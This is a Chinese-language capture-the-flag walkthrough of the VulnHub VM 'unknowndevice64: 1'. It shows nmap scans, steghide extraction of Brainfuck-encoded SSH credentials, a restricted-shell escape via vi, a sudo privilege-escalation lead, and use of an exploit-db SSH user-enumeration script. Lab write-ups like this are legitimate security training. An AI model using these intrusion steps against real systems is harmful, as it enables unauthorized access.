unknowndevice64: 1

[unknowndevice64: 1]下载地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/
target：获取机器root权限，查看/root/flag.txt

1.镜像本间导入VMware；（nat模式,镜像默认启用DHCP，kaili也在同网段（192.168.80.0/24））；
2.扫描网段，获取靶机IP

root@kali:/home/ud64# nmap -sn 192.168.80.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:43 EDT
Nmap scan report for 192.168.80.1
Host is up (0.00042s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:D4:9F:79 (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:EA:7D:F3 (VMware)
Nmap scan report for 192.168.80.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.97 seconds

3.nmap扫描靶机，查看活动端口

root@kali:/home/ud64# nmap -p- -sS -sV 192.168.80.134                    
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 00:00 EDT
Nmap scan report for 192.168.80.134
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 00:0C:29:D4:9F:79 (VMware)

显示靶机ssh端口为1337，另外靶机为http server，端口为31337；
4.web登录192.168.80.134:31337,开发者模式查看网页源码；
看到如下文件key_is_h1dd3n.jpg，提示key藏在这个jpg图片中；

image.png

下载图片到kaliwget http://192.168.80.134:31337/key_is_h1dd3n.jpg
5.使用Steghide查实破解图片隐藏的信息；关于Steghide的信息可以自行google；

root@kali:/home/ud64# apt-get install steghide    #非kali自带，安装steghide
root@kali:/home/ud64# steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n     #steghide解密要使用原来加密使用的密码，密码根据图片名字猜测，运气不错h1dd3n是密码
wrote extracted data to "h1dd3n.txt".
root@kali:/home/ud64# cat h1dd3n.txt   #查看解密文件
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

6.文件信息为一种brainfuck的程序语言，使用在线工具可解https://copy.sh/brainfuck/，在线解密后即可获取到ssh的用户名和密码；
7.登录靶机ssh ****@192.168.80.134 -p 1337(为不剧透，隐去了登录用户名)
8.登录发现为非root用户，需要提权

ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found

9.按两次tab键，显示目前用户可执行的命令

ud64@unknowndevice64_v1:~$ 
!          ]]         builtin    compgen    date       done       esac       false      function   id         let        mc         read       set        test       true       unalias    while      
./         alias      caller     complete   declare    echo       eval       fc         getopts    if         local      popd       readarray  shift      then       type       unset      whoami     
:          bg         case       compopt    dirs       elif       exec       fg         hash       in         logout     printf     readonly   shopt      time       typeset    until      {          
[          bind       cd         continue   disown     else       exit       fi         help       jobs       ls         pushd      return     source     times      ulimit     vi         }          
[[         break      command    coproc     do         enable     export     for        history    kill       mapfile    pwd        select     suspend    trap       umask      wait

发现可以使用vi，通过vi可以突破受限的shell

image.png

sh-4.4$ export PATH=/bin:/usr/bin:$PATH    #修改环境变量
sh-4.4$ cat flagRoot.txt     #这步已经可以查看flag文件了
sh-4.4$ sudo -l                  #这里可以发现一个有趣的东西，通过/usr/bin/sysud64可以执行任何root权限的命令
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64

使用到的工具：
nmap
steghide 开源隐写程序
brainfuck 程序语言
ssh用户名枚举（https://www.exploit-db.com/exploits/45939
）代码35行需要修改sock.connect((args.target, int(args.port)))使用方式python ssh_enum_user.py -p 1337 192.168.80.134 root